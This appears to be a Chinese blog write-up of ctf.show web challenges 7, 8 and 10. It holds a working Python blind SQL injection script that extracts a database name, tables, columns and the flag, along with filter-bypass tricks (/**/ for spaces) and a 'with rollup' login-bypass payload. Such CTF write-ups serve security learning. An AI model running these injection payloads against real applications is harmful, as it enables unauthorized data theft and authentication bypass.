ctf.show web7,8,10

最新推荐文章于 2024-07-30 10:53:24 发布
最新推荐文章于 2024-07-30 10:53:24 发布
阅读量989 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45826388/article/details/108558703
版权

web7
查看列表文章发现?id= 判断为sql注入
在这里插入图片描述
当有空格时会报错,用/**/绕过,得到注入点
在这里插入图片描述
盲猜flag from flag
在这里插入图片描述
web8
测试发现过滤了空格,逗号,and
在这里插入图片描述
当url判断为真时有回显
在这里插入图片描述
数据库视角:
在这里插入图片描述

进行盲注
在这里插入图片描述

substr(database(),1,1) 等同于
substr(database()from 1 for 1)
写python 脚本

import requests
import re
s = r'<h4>If</h4>'
flag = ''
url = 'http://6327c4bc-77a9-431f-9ccb-95564a82c238.chall.ctf.show/index.php?id=0/**/or/**/'
for i in range(1,50):
	for j in range(31,129):
		#html=requests.get(url+'ascii(substr(database()/**/from/**/'+str(i)+'/**/for/**/1))='+str(j)) #库
		#html=requests.get(url+'ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/'+str(i)+'/**/for/**/1))='+str(j))#表
		#html=requests.get(url+'ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/'+str(i)+'/**/for/**/1))='+str(j))#字段
		html=requests.get(url+'ascii((substr((select/**/flag/**/from/**/flag)from/**/'+str(i)+'/**/for/**/1)))='+str(j))#flag
		r=re.findall(s,html.text,re.S)
		if(r):
			flag += chr(j)
			break
print(flag)
print('------------------------------------')

得到flag
在这里插入图片描述
web10
点取消下载到源代码文件
在这里插入图片描述
判断passwd
gourp by password 将password字段分组
with rollup:在group分组字段的基础上再进行统计数据
在这里插入图片描述
payload:username='or/**/1=1/**/group/**/by/**/password/**/with/**/rollup#&password=

在这里插入图片描述

8yt1s
关注
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF 在这篇文章中,我们将探讨国科大web安全中期CTF的相关知识点。 一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的...
ctf.show web web1-web10
qq_61993117的博客
09-17 1904
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
ctfshow-WEB-web10( with rollup注入绕过)
wangyuxiang946的博客
09-05 1万+
ctf.show WEB模块第10关是一个SQL注入漏洞, 点击取消按钮可以获取源码, 审计代码可以发现源码中存在漏洞, 推荐使用with rollup注入进行绕过, 此关卡过滤了空格,and等关键字 1. 过滤空格, 可以使用括号()或者注释/**/绕过 2. 过滤and, 可以使用or来代替 进来以后是一个登录界面, 盲猜是SQL注入漏洞 点击取消按钮可以获取这一关的源码, 下载到本地即可 源码中先根据用户名查询用户信息, 用户名通过以后, 再判断密码是否相同, 我...
CTFSHOW 萌新 web7 解题思路和方法(二进制表示)
最新发布
weixin_58052886的博客
07-30 486
需要注意的是intval对字符串的转换成数字是从左边第一位开始,直到遇到非整数的字符。而我们发现过滤条件将取反也过滤掉了。那么我们可以采用其他的方式绕过if判断,
【ctf.show-web赛题】
一纸荒芜的博客
03-21 2803
主要分享自己做题的心得和积累,共勉之。
ctfshow-WEB-web7
热门推荐
wangyuxiang946的博客
08-22 1万+
ctf.show WEB模块第7关是一个SQL注入漏洞,注入点是数值型注入,源码中过滤了空格,我们可以使用括号()或者注释/**/来代替空格 页面中有一个文章列表,随便点一个 从url地址栏中可以看到,页面通过文章的id值来查询文章内容,我们可以考虑SQL注入漏洞 首先判断注入点,输入以下payload,使SQL恒成立 1/**/and/**/1 可以看到,页面正常显示 在输入以下payload,使SQL恒不成立 1/**/and/**/0 可以...
CTF show WEB10
Hello_super的博客
09-04 694
题目地址:https://ctf.show 打开页面点击取消按钮,出现源码。$regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; 从源码中可以得知几乎把注入用到的关键词过滤的差不多了。 如果只有这一条现在可以采用双写绕过,但是下面这条限制,使得无法双写绕过 if(strlen($username)!=strlen(replaceSpecialChar($username))){ die("sql inject error");
CTF.rar_ctf_seed7rj
09-21
【标题】"CTF.rar_ctf_seed7rj" 暗示了这是一个与网络安全相关的挑战,CTF(Capture The Flag)是网络安全领域常见的比赛形式,通常涉及逆向工程、密码学、网络攻防等技能。"seed7rj"可能是这次挑战的一个特定标识...
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
CTF show萌新题系列
12-22
题目地址:https://ctf.show 0X01 萌新_密码1 1.16进制转字符串 有很多网站可以实现,这里我也附上我的脚本: # author: 羽 def hex_to_str(): while True: s = input("输入要转成字符串的16进制(输入空字符串退出...
ctf.show_web10
m0_56107268的博客
05-13 366
<?php $flag=""; function replaceSpecialChar($strParam){ $regex = "/(select|from|where|join|sleep|and|\s|union|,)/i"; return preg_replace($regex,"",$strParam); } if (!$con) { die('C.
ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web10关,这一关考察的是命令执行漏洞的利用,闯关者需要知道3个以上PHP命令执行函数的使用,推荐使用passthru() 页面中展示了部分源码,并提示我们 flag 在 config.php 文件中 源码中过滤了 system,exec,highlight 这三个常用的PHP命令执行函数,绕过过滤条件就可以使用 eval() 函数执行PHP代码了,我们使用其他的命令执行函数即可,这里使用passthru()函数即可,先查看一下当前目录 ?...
ctfshow之web(9、10、11、12)
沃和莱特的博客
03-12 5169
萌新萌新,不忘初心。
CTFSHOW web1-10
m0_57131590的博客
09-23 267
web1/web签到题: 没啥好说的,右键源代码出flag web2 猜闭合方式,加上万能密码得到回显: 接下来就是普通的union注入了。 web3 进入题目之后让我们以GET方式传参,但是传入url=flag.php发现并没有变化,此时考虑用伪协议。 抓包然后发送至repeater修改: 访问xxx/?url=ctf_go_go_go得到flag web4 乍一看和上一题一样,但是如果传入参数带有php的话会报错,这时我们可以进行日志注入(我也不知道怎么得到...
CTF show----web 解题笔记(web7~web10
weixin_45908624的博客
01-05 633
ctfshow web7-web10
《CTFshow-Web入门》01. Web 1~10
学习学习学习......
11-18 2181
网页源码查看、抓包查看响应数据包、robots.txt 文件泄露、phps 文件泄露、网站备份压缩文件泄露、版本控制泄露、vim 缓存信息泄露、cookie 信息泄露。
ctf.show萌新web8
07-12
首先,你需要访问 ctf.show 网站上的 web8 页面。在该页面上,你可能会看到一些输入框或按钮等与用户交互的元素。尝试对这些元素进行各种输入和点击操作,看看是否会触发一些特殊的反应。 在与页面交互的过程中,要...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值